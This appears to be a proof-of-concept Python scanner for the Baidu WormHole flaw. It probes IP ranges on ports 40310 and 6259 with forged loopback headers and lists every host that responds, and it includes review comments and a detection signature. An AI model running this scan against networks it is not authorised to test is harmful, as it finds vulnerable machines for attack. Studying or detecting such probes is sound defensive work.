百度WormHole漏洞检测POC
WormHole 的检测代码,随手用 Python 写的:向目标 IP 的 40310 和 6259 端口请求 getserviceinfo,只要有返回内容就报告 Found。
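# exploit write by fenlog, baidu wormhole POC.
# QQ:345382462
"""Check which hosts in an IPv4 range answer the WormHole ``getserviceinfo`` probe.

Each address gets an HTTP GET on TCP 40310 and, if that yields nothing,
on TCP 6259.  A host is reported as "Found" when either request returns a
non-empty body.

Usage:
    script TargetIP
    script StartIP EndIP

Runs unchanged on Python 2.6+ and Python 3.
"""
import sys
import urllib  # not used below; kept from the original import list
from contextlib import closing

try:
    import urllib2  # Python 2
except ImportError:
    import urllib.request as urllib2  # Python 3: same Request/urlopen API

# Headers sent with every probe.  Host and remote-addr both claim the
# loopback address -- presumably to look like a local caller to the
# service; this file does not show how the service evaluates them.
# Detection note: a request on 40310/6259 that carries "Host: 127.0.0.1"
# but arrives from a non-loopback peer is a usable signature for this probe.
headers = {
    "Accept": "*/*",
    "Host": "127.0.0.1",
    "remote-addr": "127.0.0.1",
    "Referer": "http://www.baidu.com/"
}

# Ports are tried in this order; the second only if the first gave no body.
PROBE_PORTS = (40310, 6259)
PROBE_URL = "http://%s:%d/getserviceinfo?mcmdf=inapp_baidu_bdgjs&callback=jsonp"

# Per-socket-operation timeout (connect and each read), not a total budget.
TIMEOUT_SECONDS = 3

# The peer is arbitrary and untrusted, so never read an unbounded body.
MAX_BODY_BYTES = 64 * 1024


def ip2num(ip):
    """Convert a dotted-quad IPv4 string to its 32-bit integer value.

    Raises:
        ValueError: if *ip* is not exactly four decimal octets in 0..255.
    """
    parts = ip.split('.')
    if len(parts) != 4:
        raise ValueError("expected four octets: %r" % (ip,))
    value = 0
    for part in parts:
        # isdigit() rejects signs, whitespace and empty fields before int().
        if not part.isdigit():
            raise ValueError("non-numeric octet in %r" % (ip,))
        octet = int(part)
        if octet > 255:
            raise ValueError("octet out of range in %r" % (ip,))
        value = (value << 8) | octet
    return value


def num2ip(num):
    """Convert a 32-bit integer back to dotted-quad notation."""
    return '.'.join(str((num >> shift) & 0xff) for shift in (24, 16, 8, 0))


def URLRequest(url):
    """GET *url* with the probe headers and return the body as text.

    Returns "" on any request failure (refused, timeout, HTTP error, ...).
    The body is capped at MAX_BODY_BYTES.

    NOTE(review): urlopen follows redirects and any non-empty body counts
    as a hit, so an unrelated web server on the probed port can produce a
    false positive -- confirm hits by inspecting the returned body.
    """
    try:
        request = urllib2.Request(url=url, headers=headers)
        with closing(urllib2.urlopen(request, timeout=TIMEOUT_SECONDS)) as response:
            body = response.read(MAX_BODY_BYTES)
    except Exception:
        # Best-effort probe: an unreachable host is the normal case.
        # Exception (not a bare except) lets Ctrl-C still stop the scan.
        return ""
    if not isinstance(body, str):
        # Python 3 returns bytes; decode leniently since the peer is untrusted.
        body = body.decode("utf-8", "replace")
    return body


def main(argv):
    """Parse the address arguments, probe every host, and return an exit status.

    Returns 0 after a completed scan or after printing usage, 1 when the
    addresses are malformed or the start address is above the end address.
    """
    try:
        if len(argv) == 3:
            ipstart = ip2num(argv[1])
            ipend = ip2num(argv[2])
        elif len(argv) == 2:
            ipstart = ipend = ip2num(argv[1])
        else:
            print("Baidu WarmHole POC by www.fenlog.com\nUsage1: %s TargetIP \nUsage2: %s StartIP EndIP" % (argv[0], argv[0]))
            return 0
    except ValueError:
        print("Target IP Err")
        return 1

    if ipstart > ipend:
        print("Target IP Err")
        return 1

    # Counter loop instead of range(): Python 2's range() would build the
    # whole address list in memory for a wide range.
    targetip = ipstart
    while targetip <= ipend:
        strip = num2ip(targetip)
        print("Scan %s..." % (strip))
        ret = ""
        for port in PROBE_PORTS:
            ret = URLRequest(PROBE_URL % (strip, port))
            if ret:
                break
        if ret:
            # ret is printed verbatim and comes from the scanned host;
            # treat it as untrusted text when reading or storing the output.
            print("Found %s:%s" % (strip, ret))
        targetip += 1

    print("Scan %d IPs Finish!" % (ipend - ipstart + 1))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))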